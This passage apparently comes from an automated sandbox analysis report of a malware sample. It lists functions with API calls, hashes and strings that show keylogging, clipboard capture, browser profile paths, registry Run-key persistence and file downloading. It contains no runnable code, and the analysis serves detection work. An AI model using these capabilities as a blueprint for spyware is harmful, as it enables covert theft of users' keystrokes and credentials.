                                                                                              Function 004398E3 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                                                                • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                              • String ID:
                                                                                              • API String ID: 2633735394-0
                                                                                              • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                              • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                                                              • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                              • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                                                              Function 0041941E Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSystemMetrics.USER32(0000004C,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041942B
                                                                                              • GetSystemMetrics.USER32(0000004D,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419431
                                                                                              • GetSystemMetrics.USER32(0000004E,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419437
                                                                                              • GetSystemMetrics.USER32(0000004F,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041943D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MetricsSystem
                                                                                              • String ID:
                                                                                              • API String ID: 4116985748-0
                                                                                              • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                              • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                                                              • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                              • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                                                              Function 00438FB1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                                                                • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                              • String ID:
                                                                                              • API String ID: 1761009282-0
                                                                                              • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                              • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                                                              • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                              • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                                                              Function 00442CAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorHandling__start
                                                                                              • String ID: pow
                                                                                              • API String ID: 3213639722-2276729525
                                                                                              • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                              • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                                                              • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                              • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                                                              Function 0040B783 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                              • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Init_thread_footer__onexit
                                                                                              • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                              • API String ID: 1881088180-3686566968
                                                                                              • Opcode ID: ff1494b0bb0d887acac5e8b0ebc29097e9756416d4b6e07dc10a2d628bf0c193
                                                                                              • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                                                              • Opcode Fuzzy Hash: ff1494b0bb0d887acac5e8b0ebc29097e9756416d4b6e07dc10a2d628bf0c193
                                                                                              • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                                                              Function 00451BB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ACP$OCP
                                                                                              • API String ID: 0-711371036
                                                                                              • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                              • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                                                              • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                              • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                                                              Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                              • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                                                              Strings
                                                                                              • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LocalTime
                                                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                                                              • API String ID: 481472006-1507639952
                                                                                              • Opcode ID: c39db9322a8ab698ab6c6fe4d517d63c6f84dc46af59211586e7c92f61b52e84
                                                                                              • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                                                              • Opcode Fuzzy Hash: c39db9322a8ab698ab6c6fe4d517d63c6f84dc46af59211586e7c92f61b52e84
                                                                                              • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                                                              Function 00416676 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • Sleep.KERNEL32 ref: 0041667B
                                                                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DownloadFileSleep
                                                                                              • String ID: !D@
                                                                                              • API String ID: 1931167962-604454484
                                                                                              • Opcode ID: 9cbcf339d5782d21f0009647a5314bbf722ddb95791e80143436529d650ea742
                                                                                              • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                                                              • Opcode Fuzzy Hash: 9cbcf339d5782d21f0009647a5314bbf722ddb95791e80143436529d650ea742
                                                                                              • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                                                              Function 0041B580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LocalTime
                                                                                              • String ID: | $%02i:%02i:%02i:%03i
                                                                                              • API String ID: 481472006-2430845779
                                                                                              • Opcode ID: 4182ea60a7d59cd3c4daa7da87bafc9d2ec88e2c779713b19cbff176a10afb6b
                                                                                              • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                                                              • Opcode Fuzzy Hash: 4182ea60a7d59cd3c4daa7da87bafc9d2ec88e2c779713b19cbff176a10afb6b
                                                                                              • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                                                              Function 0041ADA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExistsFilePath
                                                                                              • String ID: alarm.wav$hYG
                                                                                              • API String ID: 1174141254-2782910960
                                                                                              • Opcode ID: a67f3d5249a1fb94c92f6e91cc59b1f19d843fcb2bd7b99b2c155253ed97e9bb
                                                                                              • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                                                                              • Opcode Fuzzy Hash: a67f3d5249a1fb94c92f6e91cc59b1f19d843fcb2bd7b99b2c155253ed97e9bb
                                                                                              • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                                                                              Function 0040B08C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                                                                • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                              • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                                                              • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                              • String ID: Online Keylogger Stopped
                                                                                              • API String ID: 1623830855-1496645233
                                                                                              • Opcode ID: 1a9fb93e295ecde7430af69949d9fcd4e66a132cb674e587e4338cf96b5e1dd8
                                                                                              • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                                                              • Opcode Fuzzy Hash: 1a9fb93e295ecde7430af69949d9fcd4e66a132cb674e587e4338cf96b5e1dd8
                                                                                              • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                                                              Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • waveInPrepareHeader.WINMM(?,00000020,?), ref: 00401849
                                                                                              • waveInAddBuffer.WINMM(?,00000020), ref: 0040185F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: wave$BufferHeaderPrepare
                                                                                              • String ID: XMG
                                                                                              • API String ID: 2315374483-813777761
                                                                                              • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                                              • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                                                              • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                                              • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                                                              Function 00448B66 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LocaleValid
                                                                                              • String ID: IsValidLocaleName$kKD
                                                                                              • API String ID: 1901932003-3269126172
                                                                                              • Opcode ID: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                                                              • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                                                              • Opcode Fuzzy Hash: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                                                              • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                                                              Function 0040C4FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExistsFilePath
                                                                                              • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                              • API String ID: 1174141254-4188645398
                                                                                              • Opcode ID: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                                                              • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                                                              • Opcode Fuzzy Hash: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                                                              • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                                                              Function 0040C561 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExistsFilePath
                                                                                              • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                              • API String ID: 1174141254-2800177040
                                                                                              • Opcode ID: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                                                              • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                                                              • Opcode Fuzzy Hash: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                                                              • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                                                              Function 0040C5C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5F7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExistsFilePath
                                                                                              • String ID: AppData$\Opera Software\Opera Stable\
                                                                                              • API String ID: 1174141254-1629609700
                                                                                              • Opcode ID: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                                                              • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                                                              • Opcode Fuzzy Hash: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                                                              • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                                                              Function 00443885 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free
                                                                                              • String ID: >Y
                                                                                              • API String ID: 269201875-2491313631
                                                                                              • Opcode ID: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                                                                                              • Instruction ID: 5d396c1abc39b18bdc3e623667384c8b5cce6391ee106473ff554fc58991571d
                                                                                              • Opcode Fuzzy Hash: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                                                                                              • Instruction Fuzzy Hash: 7CE0E532A0652041F675763B2D05A5B47C55FC2B3AF22033BF028861C1DFEC494A606E
                                                                                              Function 0040B681 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetKeyState.USER32(00000011), ref: 0040B686
                                                                                                • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                                                                                • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                                                • Part of subcall function 0040A41B: GetKeyboardLayout.USER32 ref: 0040A464
                                                                                                • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                                                                • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                                                                                • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A49C
                                                                                                • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A4FC
                                                                                                • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                              • String ID: [AltL]$[AltR]
                                                                                              • API String ID: 2738857842-2658077756
                                                                                              • Opcode ID: f508c8d0c28e71ac455fa2a77041b079ca691cd00d60daeee8bf3b3b3c4de222
                                                                                              • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                                                              • Opcode Fuzzy Hash: f508c8d0c28e71ac455fa2a77041b079ca691cd00d60daeee8bf3b3b3c4de222
                                                                                              • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                                                              Function 004161C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExecuteShell
                                                                                              • String ID: !D@$open
                                                                                              • API String ID: 587946157-1586967515
                                                                                              • Opcode ID: 33d0e39c2c5277f948c9383974d65c92f33d2ad08035dd6aa383958bc01fb2b1
                                                                                              • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                                                              • Opcode Fuzzy Hash: 33d0e39c2c5277f948c9383974d65c92f33d2ad08035dd6aa383958bc01fb2b1
                                                                                              • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                                                              Function 0040B6DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: State
                                                                                              • String ID: [CtrlL]$[CtrlR]
                                                                                              • API String ID: 1649606143-2446555240
                                                                                              • Opcode ID: 1ad9dfb3c513a634c020206c6c5afe09b5350a38294d89605c778c55c0391829
                                                                                              • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                                                              • Opcode Fuzzy Hash: 1ad9dfb3c513a634c020206c6c5afe09b5350a38294d89605c778c55c0391829
                                                                                              • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                                                              Function 0040E7DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                              • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Init_thread_footer__onexit
                                                                                              • String ID: ,kG$0kG
                                                                                              • API String ID: 1881088180-2015055088
                                                                                              • Opcode ID: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                                              • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                                                              • Opcode Fuzzy Hash: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                                              • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                                                              Function 00413A5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DeleteOpenValue
                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                              • API String ID: 2654517830-1051519024
                                                                                              • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                              • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                                                              • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                              • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                                                              Function 0040B8A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
